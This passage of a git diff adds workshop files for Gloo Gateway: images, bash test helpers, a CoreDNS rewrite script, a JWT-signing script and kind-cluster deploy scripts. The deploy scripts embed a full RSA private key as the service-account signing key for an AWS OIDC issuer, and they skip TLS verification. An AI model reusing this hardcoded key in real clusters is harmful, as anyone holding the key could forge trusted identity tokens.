diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-ai-gateway.svg b/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-ai-gateway.svg new file mode 100644 index 0000000000..163b09fd91 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-ai-gateway.svg @@ -0,0 +1,14 @@ + \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-gateway.svg b/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-gateway.svg new file mode 100644 index 0000000000..322368db75 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/document-gloo-gateway.svg @@ -0,0 +1,12 @@ + \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/enterprise-features.png b/gloo-gateway/1-18/enterprise-vm/default/images/enterprise-features.png new file mode 100644 index 0000000000..707c843e13 Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/enterprise-features.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-dark.png b/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-dark.png new file mode 100644 index 0000000000..0fa184c849 Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-dark.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-resource-model.png b/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-resource-model.png new file mode 100644 index 0000000000..0397ad2698 Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/gateway-api-resource-model.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/gloo-edge-architecture.png b/gloo-gateway/1-18/enterprise-vm/default/images/gloo-edge-architecture.png new file mode 100644 index 0000000000..b2048a65fb Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/gloo-edge-architecture.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/gloo-gateway-dark.svg b/gloo-gateway/1-18/enterprise-vm/default/images/gloo-gateway-dark.svg new file mode 100644 index 0000000000..dbc20ca046 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/gloo-gateway-dark.svg @@ -0,0 +1,12 @@ + \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/portal-apis.png b/gloo-gateway/1-18/enterprise-vm/default/images/portal-apis.png new file mode 100644 index 0000000000..76858d10b7 Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/portal-apis.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/security-workflow.png b/gloo-gateway/1-18/enterprise-vm/default/images/security-workflow.png new file mode 100644 index 0000000000..5a2249e81e Binary files /dev/null and b/gloo-gateway/1-18/enterprise-vm/default/images/security-workflow.png differ diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/steps/extauth-oauth/traffic-filter-flow.svg b/gloo-gateway/1-18/enterprise-vm/default/images/steps/extauth-oauth/traffic-filter-flow.svg new file mode 100644 index 0000000000..48ca244b66 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/steps/extauth-oauth/traffic-filter-flow.svg @@ -0,0 +1,16 @@ + + + + + + + UpstreamClientOrder of filters applied to trafficFaultTransformationCORSDLPWAFRate limitingSanitizeExternal authJWTRBACgRPC-webTransformationRate limitingCSRFRouterJWT123Legend5External authenticationfor client requests.Filters you can applybefore or after external auth.Filters you can apply only beforeexternal auth.Router to add or removeheaders, rewrites, and other policies.4Filters you can apply only afterexternal auth. \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-ai-gateway.svg b/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-ai-gateway.svg new file mode 100644 index 0000000000..9cca3ca903 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-ai-gateway.svg @@ -0,0 +1,14 @@ + \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-gateway.svg b/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-gateway.svg new file mode 100644 index 0000000000..9ca81f8a17 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/images/track-gloo-gateway.svg @@ -0,0 +1,12 @@ + \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/assert.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/assert.sh new file mode 100755 index 0000000000..75ba95ac90 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/assert.sh @@ -0,0 +1,252 @@ +#!/usr/bin/env bash + +##################################################################### +## +## title: Assert Extension +## +## description: +## Assert extension of shell (bash, ...) +## with the common assert functions +## Function list based on: +## http://junit.sourceforge.net/javadoc/org/junit/Assert.html +## Log methods : inspired by +## - https://natelandau.com/bash-scripting-utilities/ +## author: Mark Torok +## +## date: 07. Dec. 2016 +## +## license: MIT +## +##################################################################### + +if command -v tput &>/dev/null && tty -s; then + RED=$(tput setaf 1) + GREEN=$(tput setaf 2) + MAGENTA=$(tput setaf 5) + NORMAL=$(tput sgr0) + BOLD=$(tput bold) +else + RED=$(echo -en "\e[31m") + GREEN=$(echo -en "\e[32m") + MAGENTA=$(echo -en "\e[35m") + NORMAL=$(echo -en "\e[00m") + BOLD=$(echo -en "\e[01m") +fi + +log_header() { + printf "\n${BOLD}${MAGENTA}========== %s ==========${NORMAL}\n" "$@" >&2 +} + +log_success() { + printf "${GREEN}✔ %s${NORMAL}\n" "$@" >&2 +} + +log_failure() { + printf "${RED}✖ %s${NORMAL}\n" "$@" >&2 + file=.test-error.log + echo "$@" >> $file + echo "#############################################" >> $file + echo "#############################################" >> $file +} + + +assert_eq() { + local expected="$1" + local actual="$2" + local msg="${3-}" + + if [ "$expected" == "$actual" ]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$expected == $actual :: $msg" || true + return 1 + fi +} + +assert_not_eq() { + local expected="$1" + local actual="$2" + local msg="${3-}" + + if [ ! "$expected" == "$actual" ]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$expected != $actual :: $msg" || true + return 1 + fi +} + +assert_true() { + local actual="$1" + local msg="${2-}" + + assert_eq true "$actual" "$msg" + return "$?" +} + +assert_false() { + local actual="$1" + local msg="${2-}" + + assert_eq false "$actual" "$msg" + return "$?" +} + +assert_array_eq() { + + declare -a expected=("${!1-}") + # echo "AAE ${expected[@]}" + + declare -a actual=("${!2}") + # echo "AAE ${actual[@]}" + + local msg="${3-}" + + local return_code=0 + if [ ! "${#expected[@]}" == "${#actual[@]}" ]; then + return_code=1 + fi + + local i + for (( i=1; i < ${#expected[@]} + 1; i+=1 )); do + if [ ! "${expected[$i-1]}" == "${actual[$i-1]}" ]; then + return_code=1 + break + fi + done + + if [ "$return_code" == 1 ]; then + [ "${#msg}" -gt 0 ] && log_failure "(${expected[*]}) != (${actual[*]}) :: $msg" || true + fi + + return "$return_code" +} + +assert_array_not_eq() { + + declare -a expected=("${!1-}") + declare -a actual=("${!2}") + + local msg="${3-}" + + local return_code=1 + if [ ! "${#expected[@]}" == "${#actual[@]}" ]; then + return_code=0 + fi + + local i + for (( i=1; i < ${#expected[@]} + 1; i+=1 )); do + if [ ! "${expected[$i-1]}" == "${actual[$i-1]}" ]; then + return_code=0 + break + fi + done + + if [ "$return_code" == 1 ]; then + [ "${#msg}" -gt 0 ] && log_failure "(${expected[*]}) == (${actual[*]}) :: $msg" || true + fi + + return "$return_code" +} + +assert_empty() { + local actual=$1 + local msg="${2-}" + + assert_eq "" "$actual" "$msg" + return "$?" +} + +assert_not_empty() { + local actual=$1 + local msg="${2-}" + + assert_not_eq "" "$actual" "$msg" + return "$?" +} + +assert_contain() { + local haystack="$1" + local needle="${2-}" + local msg="${3-}" + + if [ -z "${needle:+x}" ]; then + return 0; + fi + + if [ -z "${haystack##*$needle*}" ]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$haystack doesn't contain $needle :: $msg" || true + return 1 + fi +} + +assert_not_contain() { + local haystack="$1" + local needle="${2-}" + local msg="${3-}" + + if [ -z "${needle:+x}" ]; then + return 0; + fi + + if [ "${haystack##*$needle*}" ]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$haystack contains $needle :: $msg" || true + return 1 + fi +} + +assert_gt() { + local first="$1" + local second="$2" + local msg="${3-}" + + if [[ "$first" -gt "$second" ]]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$first > $second :: $msg" || true + return 1 + fi +} + +assert_ge() { + local first="$1" + local second="$2" + local msg="${3-}" + + if [[ "$first" -ge "$second" ]]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$first >= $second :: $msg" || true + return 1 + fi +} + +assert_lt() { + local first="$1" + local second="$2" + local msg="${3-}" + + if [[ "$first" -lt "$second" ]]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$first < $second :: $msg" || true + return 1 + fi +} + +assert_le() { + local first="$1" + local second="$2" + local msg="${3-}" + + if [[ "$first" -le "$second" ]]; then + return 0 + else + [ "${#msg}" -gt 0 ] && log_failure "$first <= $second :: $msg" || true + return 1 + fi +} \ No newline at end of file diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/check.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/check.sh new file mode 100755 index 0000000000..fa52484b28 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/check.sh @@ -0,0 +1,16 @@ +#!/usr/bin/env bash + +printf "Waiting for all the kube-system pods to become ready in context $1" +until [ $(kubectl --context $1 -n kube-system get pods -o jsonpath='{range .items[*].status.containerStatuses[*]}{.ready}{"\n"}{end}' | grep false -c) -eq 0 ]; do + printf "%s" "." + sleep 1 +done +printf "\n kube-system pods are now ready \n" + +printf "Waiting for all the metallb-system pods to become ready in context $1" +until [ $(kubectl --context $1 -n metallb-system get pods -o jsonpath='{range .items[*].status.containerStatuses[*]}{.ready}{"\n"}{end}' | grep false -c) -eq 0 ]; do + printf "%s" "." + sleep 1 +done +printf "\n metallb-system pods are now ready \n" + diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/configure-domain-rewrite.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/configure-domain-rewrite.sh new file mode 100755 index 0000000000..d6e684c9da --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/configure-domain-rewrite.sh @@ -0,0 +1,93 @@ +#!/usr/bin/env bash + +set -x # Debug mode to show commands +set -e # Stop on error + +hostname="$1" +new_hostname="$2" + +## Install CoreDNS if not installed +if ! command -v coredns &> /dev/null; then + wget https://github.com/coredns/coredns/releases/download/v1.8.3/coredns_1.8.3_linux_amd64.tgz + tar xvf coredns_1.8.3_linux_amd64.tgz + sudo mv coredns /usr/local/bin/ + sudo rm -rf coredns_1.8.3_linux_amd64.tgz +fi + +name="$(echo {a..z} | tr -d ' ' | fold -w1 | shuf | head -n3 | tr -d '\n')" +tld=$(echo {a..z} | tr -d ' ' | fold -w1 | shuf | head -n2 | tr -d '\n') +random_domain="$name.$tld" +CONFIG_FILE=~/coredns.conf + +## Update coredns.conf with a rewrite rule +if grep -q "rewrite name $hostname" $CONFIG_FILE; then + sed -i "s/rewrite name $hostname.*/rewrite name $hostname $new_hostname/" $CONFIG_FILE +else + if [ ! -f "$CONFIG_FILE" ]; then + # Create a new config file if it doesn't exist + cat < $CONFIG_FILE +.:5300 { + forward . 8.8.8.8 8.8.4.4 + log +} +EOF + fi + # Append a new rewrite rule + sed -i "/log/i \ rewrite name $hostname $new_hostname" $CONFIG_FILE +fi + +# Ensure the random domain rewrite rule is always present +if grep -q "rewrite name .* httpbin.org" $CONFIG_FILE; then + sed -i "s/rewrite name .* httpbin.org/rewrite name $random_domain httpbin.org/" $CONFIG_FILE +else + sed -i "/log/i \ rewrite name $random_domain httpbin.org" $CONFIG_FILE +fi + +cat $CONFIG_FILE # Display the config for debugging + +## Check if CoreDNS is running and kill it +if pgrep coredns; then + pkill coredns + # wait for the process to be terminated + sleep 10 +fi + +## Restart CoreDNS with the updated config +nohup coredns -conf $CONFIG_FILE &> /dev/null & + +## Configure the system resolver +sudo tee /etc/systemd/resolved.conf > /dev/null < /dev/null || ! command -v jq &> /dev/null; then + echo "Both openssl and jq are required to run this script." + exit 1 +fi + +PRIVATE_KEY_PATH=$1 +SUBJECT=$2 +TEAM=$3 +LLM=$4 +MODEL=$5 + +if [ -z "$PRIVATE_KEY_PATH" ] || [ -z "$SUBJECT" ] || [ -z "$TEAM" ] || [ -z "$LLM" ] || [ -z "$MODEL" ]; then + echo "Usage: $0 " + exit 1 +fi + + +if [[ "$LLM" != "openai" && "$LLM" != "mistral" ]]; then + echo "LLM must be either 'openai' or 'mistral'." + exit 1 +fi + +HEADER='{"alg":"RS256","typ":"JWT"}' +PAYLOAD=$(jq -n --arg sub "$SUBJECT" --arg team "$TEAM" --arg llm "$LLM" --arg model "$MODEL" \ +'{ + "iss": "solo.io", + "org": "solo.io", + "sub": $sub, + "team": $team, + "llms": { + ($llm): [$model] + } +}') + +# Encode Base64URL function +base64url_encode() { + openssl base64 -e | tr -d '=' | tr '/+' '_-' | tr -d '\n' +} + +# Create JWT Header +HEADER_BASE64=$(echo -n $HEADER | base64url_encode) + +# Create JWT Payload +PAYLOAD_BASE64=$(echo -n $PAYLOAD | base64url_encode) + +# Create JWT Signature +SIGNING_INPUT="${HEADER_BASE64}.${PAYLOAD_BASE64}" +SIGNATURE=$(echo -n $SIGNING_INPUT | openssl dgst -sha256 -sign $PRIVATE_KEY_PATH | base64url_encode) + +# Combine all parts to get the final JWT token +JWT_TOKEN="${SIGNING_INPUT}.${SIGNATURE}" + +# Output the JWT token +echo $JWT_TOKEN diff --git a/gloo-gateway/1-18/enterprise-vm/default/scripts/deploy-aws-with-calico.sh b/gloo-gateway/1-18/enterprise-vm/default/scripts/deploy-aws-with-calico.sh new file mode 100755 index 0000000000..e4df4bcd38 --- /dev/null +++ b/gloo-gateway/1-18/enterprise-vm/default/scripts/deploy-aws-with-calico.sh @@ -0,0 +1,254 @@ +#!/usr/bin/env bash +set -o errexit + +number=$1 +name=$2 +region=$3 +zone=$4 +twodigits=$(printf "%02d\n" $number) +kindest_node=${KINDEST_NODE:-kindest\/node:v1.28.0@sha256:b7a4cad12c197af3ba43202d3efe03246b3f0793f162afb40a33c923952d5b31} + +if [ -z "$3" ]; then + region=us-east-1 +fi + +if [ -z "$4" ]; then + zone=us-east-1a +fi + +if hostname -I 2>/dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +mkdir -p /tmp/oidc + +cat <<'EOF' >/tmp/oidc/sa-signer-pkcs8.pub +-----BEGIN PUBLIC KEY----- +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA53YiBcrn7+ZK0Vb4odeA +1riYdvEb8To4H6/HtF+OKzuCIXFQ+bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL +395nvxdly83SUrdh7ItfOPRluuuiPHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0Zw +zIM9OviX8iEF8xHWUtz4BAMDG8N6+zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm +5X5uOKsCHMtNSjqYUNB1DxN6xxM+odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD8 +2p/16KQKU6TkZSrldkYxiHIPhu+5f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9 +ywIDAQAB +-----END PUBLIC KEY----- +EOF + +cat <<'EOF' >/tmp/oidc/sa-signer.key +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEA53YiBcrn7+ZK0Vb4odeA1riYdvEb8To4H6/HtF+OKzuCIXFQ ++bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL395nvxdly83SUrdh7ItfOPRluuui +PHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0ZwzIM9OviX8iEF8xHWUtz4BAMDG8N6 ++zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm5X5uOKsCHMtNSjqYUNB1DxN6xxM+ +odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD82p/16KQKU6TkZSrldkYxiHIPhu+5 +f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9ywIDAQABAoIBAB8tro+RMYUDRHjG +el9ypAxIeWEsQVNRQFYkW4ZUiNYSAgl3Ni0svX6xAg989peFVL+9pLVIcfDthJxY +FVlNCjBxyQ/YmwHFC9vQkARJEd6eLUXsj8INtS0ubbp1VxCQRDDL0C/0z7OSoJJh +SwboqjEiTJExA2a+RArmEDTBRzdi3t+kT8G23JcqOivrITt17K6bQYyJXw7/vUdc +r/R+hfd5TqVq92VddzDT7RNJAxsbPPXjGnESlq1GALBDs+uBGYsP0fiEJb2nicSv +z9fBnBeERhut1gcE0C0iLRQZb+3r8TitBtxrZv+0BHgXrkKtXDwWTqGEKOwC4dBn +7nxkH2ECgYEA6+/DOTABGYOWOQftFkJMjcugzDrjoGpuXuVOTb65T+3FHAzU93zy +3bt3wQxrlugluyy9Sc/PL3ck2LgUsPHZ+s7zsdGvvGALBD6bOSSKATz9JgjwifO8 +PgqUz1kXRwez2CtKLOOCFFtcIzEdWIzsa1ubNqLzgN7rD+XBkUc2uEcCgYEA+yTy +72EDMQVoIZOygytHsDNdy0iS2RsBbdurT27wkYuFpFUVWdbNSL+8haE+wJHseHcw +BD4WIMpU+hnS4p4OO8+6V7PiXOS5E/se91EJigZAoixgDUiC8ihojWgK9PYEavUo +hULWbayO59SxYWeUI4Ze0GP8Jw8vdB86ib4ulF0CgYEAgyzRuLjk05+iZODwQyDn +WSquov3W0rh51s7cw0LX2wWSQm8r9NGGYhs5kJ5sLwGxAKj2MNSWF4jBdrCZ6Gr+ +y4BGY0X209/+IAUC3jlfdSLIiF4OBlT6AvB1HfclhvtUVUp0OhLfnpvQ1UwYScRI +KcRLvovIoIzP2g3emfwjAz8CgYEAxUHhOhm1mwRHJNBQTuxok0HVMrze8n1eov39 +0RcvBvJSVp+pdHXdqX1HwqHCmxhCZuAeq8ZkNP8WvZYY6HwCbAIdt5MHgbT4lXQR +f2l8F5gPnhFCpExG5ZLNg/urV3oAQE4stHap21zEpdyOMhZb6Yc5424U+EzaFdgN +b3EcPtUCgYAkKvUlSnBbgiJz1iaN6fuTqH0efavuFGMhjNmG7GtpNXdgyl1OWIuc +Yu+tZtHXtKYf3B99GwPrFzw/7yfDwae5YeWmi2/pFTH96wv3brJBqkAWY8G5Rsmd +qF50p34vIFqUBniNRwSArx8t2dq/CuAMgLAtSjh70Q6ZAnCF85PD8Q== +-----END RSA PRIVATE KEY----- +EOF + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + extraMounts: + - containerPath: /etc/kubernetes/oidc + hostPath: /tmp/oidc + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +kubeadmConfigPatches: +- | + kind: ClusterConfiguration + apiServer: + extraArgs: + service-account-key-file: /etc/kubernetes/pki/sa.pub + service-account-key-file: /etc/kubernetes/oidc/sa-signer-pkcs8.pub + service-account-signing-key-file: /etc/kubernetes/oidc/sa-signer.key + service-account-issuer: https://solo-workshop-oidc.s3.us-east-1.amazonaws.com + api-audiences: sts.amazonaws.com + extraVolumes: + - name: oidc + hostPath: /etc/kubernetes/oidc + mountPath: /etc/kubernetes/oidc + readOnly: true + metadata: + name: config +containerdConfigPatches: +- |- + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."localhost:${reg_port}"] + endpoint = ["http://${reg_name}:${reg_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."docker.io"] + endpoint = ["http://docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-docker.pkg.dev"] + endpoint = ["http://us-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."us-central1-docker.pkg.dev"] + endpoint = ["http://us-central1-docker:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."quay.io"] + endpoint = ["http://quay:${cache_port}"] + [plugins."io.containerd.grpc.v1.cri".registry.mirrors."gcr.io"] + endpoint = ["http://gcr:${cache_port}"] +${KIND_ADDL_FEATURES} +EOF + +kind create cluster --name kind${number} --config kind${number}.yaml + +ipkind=$(docker inspect kind${number}-control-plane | jq -r '.[0].NetworkSettings.Networks[].IPAddress') +networkkind=$(echo ${ipkind} | awk -F. '{ print $1"."$2 }') + +kubectl config set-cluster kind-kind${number} --server=https://${myip}:70${twodigits} --insecure-skip-tls-verify=true + +docker network connect "kind" "${reg_name}" || true +docker network connect "kind" docker || true +docker network connect "kind" us-docker || true +docker network connect "kind" us-central1-docker || true +docker network connect "kind" quay || true +docker network connect "kind" gcr || true + +curl -sL https://raw.githubusercontent.com/projectcalico/calico/v3.28.1/manifests/calico.yaml | sed 's/250m/50m/g' | kubectl --context kind-kind${number} apply -f - + +# Preload images +cat << EOF >> images.txt +quay.io/metallb/controller:v0.13.12 +quay.io/metallb/speaker:v0.13.12 +EOF +cat images.txt | while read image; do + docker pull $image || true + kind load docker-image $image --name kind${number} || true +done +kubectl --context=kind-kind${number} apply -f https://raw.githubusercontent.com/metallb/metallb/v0.13.12/config/manifests/metallb-native.yaml +kubectl --context=kind-kind${number} create secret generic -n metallb-system memberlist --from-literal=secretkey="$(openssl rand -base64 128)" +kubectl --context=kind-kind${number} -n metallb-system rollout status deploy controller || true + +cat << EOF > metallb${number}.yaml +apiVersion: metallb.io/v1beta1 +kind: IPAddressPool +metadata: + name: first-pool + namespace: metallb-system +spec: + addresses: + - ${networkkind}.1${twodigits}.1-${networkkind}.1${twodigits}.254 +--- +apiVersion: metallb.io/v1beta1 +kind: L2Advertisement +metadata: + name: empty + namespace: metallb-system +EOF + +printf "Create IPAddressPool in kind-kind${number}\n" +for i in {1..10}; do +kubectl --context=kind-kind${number} apply -f metallb${number}.yaml && break +sleep 2 +done + +printf "Renaming context kind-kind${number} to ${name}\n" +for i in {1..100}; do + (kubectl config get-contexts -oname | grep ${name}) && break + kubectl config rename-context kind-kind${number} ${name} && break + printf " $i"/100 + sleep 2 + [ $i -lt 100 ] || exit 1 +done +cat </dev/null; then + myip=$(hostname -I | awk '{ print $1 }') +else + myip=$(ipconfig getifaddr en0) +fi + +# Function to determine the next available cluster number +get_next_cluster_number() { + if ! kind get clusters 2>&1 | grep "^kind" > /dev/null; then + echo 1 + else + highest_num=$(kind get clusters | grep "^kind" | tail -1 | cut -c 5-) + echo $((highest_num + 1)) + fi +} + +if [ -f /.dockerenv ]; then +myip=$HOST_IP +container=$(docker inspect $(docker ps -q) | jq -r ".[] | select(.Config.Hostname == \"$HOSTNAME\") | .Name" | cut -d/ -f2) +docker network connect "kind" $container || true +number=$(get_next_cluster_number) +twodigits=$(printf "%02d\n" $number) +fi + +reg_name='kind-registry' +reg_port='5000' +docker start "${reg_name}" 2>/dev/null || \ +docker run -d --restart=always -p "0.0.0.0:${reg_port}:5000" --name "${reg_name}" registry:2 + +cache_port='5000' +cat > registries < ${HOME}/.${cache_name}-config.yml </dev/null || \ +docker run -d --restart=always ${DEPLOY_EXTRA_PARAMS} -v ${HOME}/.${cache_name}-config.yml:/etc/docker/registry/config.yml --name "${cache_name}" registry:2 +done + +mkdir -p /tmp/oidc + +cat <<'EOF' >/tmp/oidc/sa-signer-pkcs8.pub +-----BEGIN PUBLIC KEY----- +MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA53YiBcrn7+ZK0Vb4odeA +1riYdvEb8To4H6/HtF+OKzuCIXFQ+bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL +395nvxdly83SUrdh7ItfOPRluuuiPHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0Zw +zIM9OviX8iEF8xHWUtz4BAMDG8N6+zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm +5X5uOKsCHMtNSjqYUNB1DxN6xxM+odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD8 +2p/16KQKU6TkZSrldkYxiHIPhu+5f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9 +ywIDAQAB +-----END PUBLIC KEY----- +EOF + +cat <<'EOF' >/tmp/oidc/sa-signer.key +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEA53YiBcrn7+ZK0Vb4odeA1riYdvEb8To4H6/HtF+OKzuCIXFQ ++bRy7yMrDGITYpfYPrTZOgfdeTLZqOiAj+cL395nvxdly83SUrdh7ItfOPRluuui +PHnFn111wpyjBw5nut4Kx+M5MksNfA1hU0ZwzIM9OviX8iEF8xHWUtz4BAMDG8N6 ++zpLo0pAzaei5hKuLZ9dZOzHBC8VOW82cQMm5X5uOKsCHMtNSjqYUNB1DxN6xxM+ +odGWT/6xthPGk6YCxmO28YHPFZfiS2eAIpD82p/16KQKU6TkZSrldkYxiHIPhu+5 +f9faZJG7dB9pLN1SfdTBio4PK5Mz9muLUCv9ywIDAQABAoIBAB8tro+RMYUDRHjG +el9ypAxIeWEsQVNRQFYkW4ZUiNYSAgl3Ni0svX6xAg989peFVL+9pLVIcfDthJxY +FVlNCjBxyQ/YmwHFC9vQkARJEd6eLUXsj8INtS0ubbp1VxCQRDDL0C/0z7OSoJJh +SwboqjEiTJExA2a+RArmEDTBRzdi3t+kT8G23JcqOivrITt17K6bQYyJXw7/vUdc +r/R+hfd5TqVq92VddzDT7RNJAxsbPPXjGnESlq1GALBDs+uBGYsP0fiEJb2nicSv +z9fBnBeERhut1gcE0C0iLRQZb+3r8TitBtxrZv+0BHgXrkKtXDwWTqGEKOwC4dBn +7nxkH2ECgYEA6+/DOTABGYOWOQftFkJMjcugzDrjoGpuXuVOTb65T+3FHAzU93zy +3bt3wQxrlugluyy9Sc/PL3ck2LgUsPHZ+s7zsdGvvGALBD6bOSSKATz9JgjwifO8 +PgqUz1kXRwez2CtKLOOCFFtcIzEdWIzsa1ubNqLzgN7rD+XBkUc2uEcCgYEA+yTy +72EDMQVoIZOygytHsDNdy0iS2RsBbdurT27wkYuFpFUVWdbNSL+8haE+wJHseHcw +BD4WIMpU+hnS4p4OO8+6V7PiXOS5E/se91EJigZAoixgDUiC8ihojWgK9PYEavUo +hULWbayO59SxYWeUI4Ze0GP8Jw8vdB86ib4ulF0CgYEAgyzRuLjk05+iZODwQyDn +WSquov3W0rh51s7cw0LX2wWSQm8r9NGGYhs5kJ5sLwGxAKj2MNSWF4jBdrCZ6Gr+ +y4BGY0X209/+IAUC3jlfdSLIiF4OBlT6AvB1HfclhvtUVUp0OhLfnpvQ1UwYScRI +KcRLvovIoIzP2g3emfwjAz8CgYEAxUHhOhm1mwRHJNBQTuxok0HVMrze8n1eov39 +0RcvBvJSVp+pdHXdqX1HwqHCmxhCZuAeq8ZkNP8WvZYY6HwCbAIdt5MHgbT4lXQR +f2l8F5gPnhFCpExG5ZLNg/urV3oAQE4stHap21zEpdyOMhZb6Yc5424U+EzaFdgN +b3EcPtUCgYAkKvUlSnBbgiJz1iaN6fuTqH0efavuFGMhjNmG7GtpNXdgyl1OWIuc +Yu+tZtHXtKYf3B99GwPrFzw/7yfDwae5YeWmi2/pFTH96wv3brJBqkAWY8G5Rsmd +qF50p34vIFqUBniNRwSArx8t2dq/CuAMgLAtSjh70Q6ZAnCF85PD8Q== +-----END RSA PRIVATE KEY----- +EOF + +cat << EOF > kind${number}.yaml +kind: Cluster +apiVersion: kind.x-k8s.io/v1alpha4 +nodes: +- role: control-plane + image: ${kindest_node} + extraPortMappings: + - containerPort: 6443 + hostPort: 70${twodigits} + extraMounts: + - containerPath: /etc/kubernetes/oidc + hostPath: /tmp/oidc + labels: + ingress-ready: true + topology.kubernetes.io/region: ${region} + topology.kubernetes.io/zone: ${zone} +networking: + disableDefaultCNI: true + serviceSubnet: "10.$(echo $twodigits | sed 's/^0*//').0.0/16" + podSubnet: "10.1${twodigits}.0.0/16" +kubeadmConfigPatches: +- | + kind: ClusterConfiguration + apiServer: + extraArgs: + service-account-key-file: /etc/kubernetes/pki/sa.pub + service-account-key-file: /etc/kubernetes/oidc/sa-signer-pkcs8.pub + service-account-signing-key-file: /etc/kubernetes/oidc/sa-signer.key + service-account-issuer: https://solo-workshop-oidc.s3.us-east-1.amazonaws.com + api-audiences: sts.amazonaws.com + extraVolumes: 